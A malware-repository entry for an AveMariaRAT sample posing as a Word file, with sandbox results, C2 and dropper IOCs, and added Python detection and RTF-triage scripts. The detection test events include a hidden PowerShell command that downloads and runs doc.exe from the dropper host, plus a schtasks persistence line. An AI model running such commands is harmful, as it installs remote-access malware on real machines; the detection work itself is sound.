MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: AveMariaRAT
Vendor detections: 10

SHA256 hash: 7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32
SHA3-384 hash: 35c37473e7a9d9a701653d616a51172f2c97ea44c8adedda06ef915b79be2c9dd4b5775ffb3ec529496cf540c5c7904b
SHA1 hash: f6a98ac4e50a89495626b5eaebb85d1116554faa
MD5 hash: 84c45c2b0e94b8d1d064e739150ba84c
humanhash: freddie-mango-yellow-burger
File name: catalogue_2021_samples_list_revise_ol.doc
Signature: AveMariaRAT
File size: 548'674 bytes
First seen: 2021-09-28 09:21:12 UTC
Last seen: Never
File type: Word file doc
MIME type: text/plain
ssdeep: 12288:z////////////////////////////////////CAggMdzFHRsU0:evRsU0
TLSH: T16BC4AFD458DA80A6B98105DDD9C0F44D9820FED1355FDE28C7AECC73AE596F8AEC408B
Reporter: @abuse_ch
Tags: AveMariaRAT doc

Intelligence


File Origin
# of uploads: 1
# of downloads: 116
Origin country: FR
Mail intelligence: No data

Vendor Threat Intelligence
ID: 1
File name: catalogue_2021_samples_list_revise_ol.doc
Verdict: Malicious activity
Analysis date: 2021-09-28 10:30:48 UTC
Tags: ole-embedded trojan opendir loader

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Verdict: Malicious
File type: application/msword
Has a screenshot: False
Contains macros: False

Result
Verdict: Malicious
File Type: Fake RTF File
Alert level: 9%

Result
Threat name: AveMaria UACMe
Detection: malicious
Classification: phis.troj.spyw.expl.evad
Score: 100 / 100
Signature
.NET source code contains potential unpacker
.NET source code contains very large strings
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Document exploit detected (process start blacklist hit)
Found malware configuration
Found suspicious RTF objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Injects files into Windows application
Machine Learning detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office creates scripting files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Office process drops PE file
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Powershell download and execute file
Sigma detected: PowerShell DownloadFile
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected AntiVM3
Yara detected AveMaria stealer
Yara detected UACMe UAC Bypass tool
Behaviour
Behavior Graph ID: 492615
Sample: catalogue_2021_samples_list...
Start date: 28/09/2021
Architecture: WINDOWS
Score: 100

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 22 other signatures

Process tree (network contacts, dropped files and signatures listed under the process they belong to):

WINWORD.EXE
    network: 13.92.100.208 (ports 49167, 49168, 80) MICROSOFT-CORP-MSN-AS-BLOCKUS, United States
    dropped: C:\Users\user\AppData\Local\...\doc[1].exe (PE32)
    dropped: C:\Users\user\AppData\...\abdtfhghgeghDh .ScT (data)
    dropped: C:\Users\user\AppData\Local\...\160C60F1.png, 370
    signatures: Document exploit detected (creates forbidden files); Suspicious powershell command line found; Tries to download and execute files (via powershell); Microsoft Office creates scripting files
    |
    +-- powershell.exe
    |       dropped: C:\Users\user\AppData\Roaming\doc.exe (PE32)
    |       |
    |       +-- doc.exe
    |               dropped: C:\Users\user\AppData\Roaming\maBdogbw.exe (PE32)
    |               dropped: C:\Users\user\AppData\Local\...\tmp2C00.tmp (XML)
    |               signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to inject threads in other processes; 4 other signatures
    |               |
    |               +-- doc.exe
    |               |       network: 152.67.253.163 (ports 49169, 5300) ORACLE-BMC-31898US, United States
    |               |       signatures: Increases the number of concurrent connection per server for Internet Explorer; Hides that the sample has been downloaded from the Internet (zone.identifier)
    |               +-- schtasks.exe
    |               +-- doc.exe
    |               +-- doc.exe
    |
    +-- powershell.exe
    |       network: 13.92.100.20 MICROSOFT-CORP-MSN-AS-BLOCKUS, United States
    |       signatures: Powershell drops PE file
    |
    +-- notepad.exe
    |       signatures: Injects files into Windows application
    |
    +-- 2 other processes
Threat name: Script-WScript.Trojan.RTFObfustream
Status: Malicious
First seen: 2021-09-28 09:15:38 UTC
AV detection: 14 of 45 (31.11%)
Threat level: 5/5

Result
Malware family: warzonerat
Score: 10/10
Tags: family:warzonerat infostealer rat suricata
Behaviour
Checks processor information in registry
Creates scheduled task(s)
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies registry class
NTFS ADS
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Office loads VBA resources, possible macro or embedded object present
Enumerates physical storage devices
Program crash
Drops file in Windows directory
Suspicious use of SetThreadContext
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Warzone RAT Payload
Process spawned unexpected child process
WarzoneRat, AveMaria
suricata: ET MALWARE Possible Malicious Macro DL EXE Feb 2016
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Malware Config
C2 Extraction: 152.67.253.163:5300
Dropper Extraction: httP://13.92.100.208/doc/doc.exe
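The sandbox signatures and Sigma titles above (Microsoft Office product spawning a Windows shell, PowerShell DownloadFile, PowerShell download and execute), the schtasks.exe persistence step in the behaviour graph, and the extracted C2 endpoint and dropper URL translate directly into host detection logic. The following Python script is an added example written for this page; it is not MalwareBazaar's code, not the vendor sandbox's signatures and not the Sigma rules themselves, only an approximation of what each of those titles checks. It runs the rules over a constructed set of process, file and network events shaped after the behaviour graph. The command lines, the task name and the benign explorer.exe event are invented for the demonstration; only the IP addresses, port, URL and file paths come from this entry.

```python
import os
from typing import Callable, Dict, List

# IOCs from the Malware Config section of this entry.
C2_ENDPOINT = ("152.67.253.163", 5300)
DROPPER_HOST = "13.92.100.208"
DROPPER_URL = "httP://13.92.100.208/doc/doc.exe".lower()   # the page lists the scheme in mixed case

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "start-bitstransfer")
EXEC_MARKERS = ("start-process", "invoke-expression", "iex ", "iex(")


def base(path: str) -> str:
    """Image name from a Windows path, case-folded (works on any host OS)."""
    return os.path.basename(path.replace("\\", "/")).lower()


def office_spawns_shell(ev: Dict) -> bool:
    """Approximation of 'Microsoft Office Product Spawning Windows Shell'."""
    return ev["type"] == "process" and base(ev["parent"]) in OFFICE and base(ev["image"]) in SHELLS


def powershell_download_file(ev: Dict) -> bool:
    """Approximation of 'PowerShell DownloadFile': a download primitive on the command line."""
    if ev["type"] != "process" or base(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    return any(m in ev["cmdline"].lower() for m in DOWNLOAD_MARKERS)


def powershell_download_and_execute(ev: Dict) -> bool:
    """Approximation of 'Powershell download and execute file': download plus an execute primitive."""
    return powershell_download_file(ev) and any(m in ev["cmdline"].lower() for m in EXEC_MARKERS)


def dropper_url_in_cmdline(ev: Dict) -> bool:
    """Direct IOC hit: the extracted dropper URL appears on a command line."""
    return ev["type"] == "process" and DROPPER_URL in ev["cmdline"].lower()


def schtasks_create_from_appdata(ev: Dict) -> bool:
    """schtasks /create whose parent lives under a user profile (doc.exe -> schtasks.exe above)."""
    return (ev["type"] == "process" and base(ev["image"]) == "schtasks.exe"
            and "/create" in ev["cmdline"].lower() and "\\appdata\\" in ev["parent"].lower())


def office_or_powershell_drops_pe(ev: Dict) -> bool:
    """'Office process drops PE file' / 'Powershell drops PE file' on a file-create event."""
    return (ev["type"] == "file" and base(ev["image"]) in (OFFICE | {"powershell.exe"})
            and ev["path"].lower().endswith(".exe"))


def ioc_network_match(ev: Dict) -> bool:
    """Connection to the extracted C2 endpoint or to the dropper host."""
    return ev["type"] == "network" and ((ev["dst"], ev["dport"]) == C2_ENDPOINT or ev["dst"] == DROPPER_HOST)


RULES: Dict[str, Callable[[Dict], bool]] = {
    "office_spawns_shell": office_spawns_shell,
    "powershell_download_file": powershell_download_file,
    "powershell_download_and_execute": powershell_download_and_execute,
    "dropper_url_in_cmdline": dropper_url_in_cmdline,
    "schtasks_create_from_appdata": schtasks_create_from_appdata,
    "office_or_powershell_drops_pe": office_or_powershell_drops_pe,
    "ioc_network_match": ioc_network_match,
}


def run_rules(events: List[Dict]) -> List[Dict]:
    """Evaluate every rule against every event; one alert per (rule, event) hit."""
    return [{"rule": name, "event": i, "image": base(ev["image"])}
            for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
DOC_EXE = r"C:\Users\user\AppData\Roaming\doc.exe"

# Constructed events shaped after the behaviour graph. Command lines, the task
# name and the benign event are invented; IPs, port, URL and paths are from the entry.
CONSTRUCTED_EVENTS = [
    {"type": "process", "parent": WINWORD, "image": PS,
     "cmdline": rf"powershell -NoP -W Hidden -ExecutionPolicy Bypass -Command "
                rf"(New-Object Net.WebClient).DownloadFile('http://13.92.100.208/doc/doc.exe','{DOC_EXE}'); "
                rf"Start-Process '{DOC_EXE}'"},
    {"type": "network", "image": PS, "dst": "13.92.100.208", "dport": 80},
    {"type": "file", "image": PS, "path": DOC_EXE},
    {"type": "process", "parent": PS, "image": DOC_EXE, "cmdline": DOC_EXE},
    {"type": "process", "parent": DOC_EXE, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn doc /tr "C:\Users\user\AppData\Roaming\maBdogbw.exe" /sc onlogon'},
    {"type": "network", "image": DOC_EXE, "dst": "152.67.253.163", "dport": 5300},
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": PS,   # benign admin use, must not fire
     "cmdline": "powershell -Command Get-Process"},
]

if __name__ == "__main__":
    for alert in run_rules(CONSTRUCTED_EVENTS):
        print(alert)
```

The IOC rules are the cheapest to deploy and the quickest to go stale: the dropper host and C2 address belong to this one campaign, while the parent/child and command-line rules catch the same delivery chain with a different payload.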

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as Malpedia. Those are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:WHITE rules are displayed.

Rule name: INDICATOR_RTF_Exploit_Scripting
Author: ditekSHen
Description: Detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Rule name: INDICATOR_RTF_MalVer_Objects
Author: ditekSHen
Description: Detects RTF documents with a non-standard version and embedding one of the objects most often observed in exploit documents.
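The file information above (a .doc name served as text/plain, which one sandbox reports as a "Fake RTF File" with "suspicious RTF objects") and the two YARA rule descriptions (a non-standard RTF version header plus embedded objects typical of exploit documents) describe the same three static checks. The following Python script is an added example written for this page; it is not MalwareBazaar's code and not ditekSHen's rules, and the header regex and control-word list are my approximation of what those rules look for rather than their actual logic. It runs the checks against a constructed fake RTF, decodes the hex in its \objdata stream, and also verifies a candidate file's digests against the hashes listed in this entry so you know you are looking at the catalogued sample. The sample bytes and the benign RTF are made up for the demonstration.

```python
import hashlib
import re

# Digests listed in the MalwareBazaar entry above.
ENTRY_HASHES = {
    "sha256": "7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32",
    "sha1": "f6a98ac4e50a89495626b5eaebb85d1116554faa",
    "md5": "84c45c2b0e94b8d1d064e739150ba84c",
}

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")      # binary .doc / OLE compound file header
RTF_HEADER_RE = re.compile(rb"^\{\\rt(f?)(\d*)")    # Word writes exactly "{\rtf1"

# Control words that embed or auto-load OLE objects; the ones CVE-2017-8759 /
# CVE-2017-8570 style documents rely on. \objupdate forces the object to load on open.
OBJECT_CONTROL_WORDS = (b"\\objupdate", b"\\objdata", b"\\objclass",
                        b"\\objemb", b"\\objautlink", b"\\object")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def matches_entry(data: bytes) -> bool:
    """True only if all three listed digests match, i.e. this really is the catalogued file."""
    return all(hashlib.new(alg, data).hexdigest() == h for alg, h in ENTRY_HASHES.items())


def is_rtf(data: bytes) -> bool:
    return RTF_HEADER_RE.match(data) is not None


def has_standard_rtf_version(data: bytes) -> bool:
    """Only '{\\rtf1' is what a legitimate generator emits; the parser tolerates
    '{\\rt', '{\\rtf' or '{\\rtf9', which is why exploit documents use them."""
    m = RTF_HEADER_RE.match(data)
    return m is not None and m.group(1) == b"f" and m.group(2) == b"1"


def object_control_words(data: bytes) -> list:
    return [cw for cw in OBJECT_CONTROL_WORDS if cw in data]


def decode_objdata(data: bytes) -> list:
    """Decode every \\objdata hex stream, stripping the whitespace padding obfuscators insert."""
    blobs = []
    for m in OBJDATA_RE.finditer(data):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:                  # odd nibble count: drop the dangling nibble
            hexstr = hexstr[:-1]
        blobs.append(bytes.fromhex(hexstr.decode("ascii")))
    return blobs


def triage(data: bytes, claimed_name: str) -> dict:
    findings = []
    if claimed_name.lower().endswith(".doc") and not data.startswith(OLE_MAGIC):
        findings.append("extension says binary .doc but content is not an OLE compound file")
    if is_rtf(data):
        if not has_standard_rtf_version(data):
            findings.append("non-standard RTF version header")
        cws = object_control_words(data)
        if cws:
            findings.append("embedded object control words: " + ", ".join(c.decode() for c in cws))
        for blob in decode_objdata(data):
            if OLE_MAGIC in blob:
                findings.append("objdata carries an OLE compound file")
            if b"MZ" in blob:
                findings.append("objdata carries an 'MZ' marker (possible PE image)")
    return {
        "is_catalogued_sample": matches_entry(data),
        "findings": findings,
        "verdict": "suspicious" if findings else "no static RTF indicators",
    }


# Constructed input, not bytes from the real sample: "{\rt" header without "f1",
# \objupdate to auto-load, and an \objdata stream padded with whitespace that
# carries the OLE magic.
CONSTRUCTED_SAMPLE = (
    b"{\\rt\\ansi\n"
    b"{\\object\\objemb\\objupdate\\objw1\\objh1\n"
    b"{\\*\\objdata 0105 0000\n0200 0000\n" + OLE_MAGIC.hex().encode() + b"\n0000}}}"
)
CONSTRUCTED_BENIGN = b"{\\rtf1\\ansi\\deff0 Hello from a plain RTF.}"

if __name__ == "__main__":
    print(triage(CONSTRUCTED_SAMPLE, "catalogue_2021_samples_list_revise_ol.doc"))
    print(triage(CONSTRUCTED_BENIGN, "report.rtf"))
```

Run it against the downloaded sample by reading the file into `data` and passing its name; `is_catalogued_sample` should then be True, and the findings should line up with the "Fake RTF File" and "Found suspicious RTF objects" results above.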

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments